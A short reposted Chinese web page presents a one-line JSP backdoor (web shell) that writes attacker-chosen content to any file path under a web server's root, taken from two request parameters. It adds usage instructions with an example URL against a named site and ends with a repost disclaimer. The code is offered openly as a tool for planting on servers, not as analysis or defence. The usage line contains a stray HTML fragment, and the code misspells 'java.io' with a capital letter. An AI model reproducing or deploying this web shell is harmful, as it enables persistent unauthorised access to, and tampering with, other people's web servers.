JSP一句话后门

<%
if(request.getParameter("f")!=null)(new Java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.NET.cn/1.jsp?f=1.txt&t=HelloWorld

然后:http://www.whitehouse.NET.cn/1.txt 就出来了 内容为 HelloWorld 

jsp技术JSP一句话后门,转载需保留来源!

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。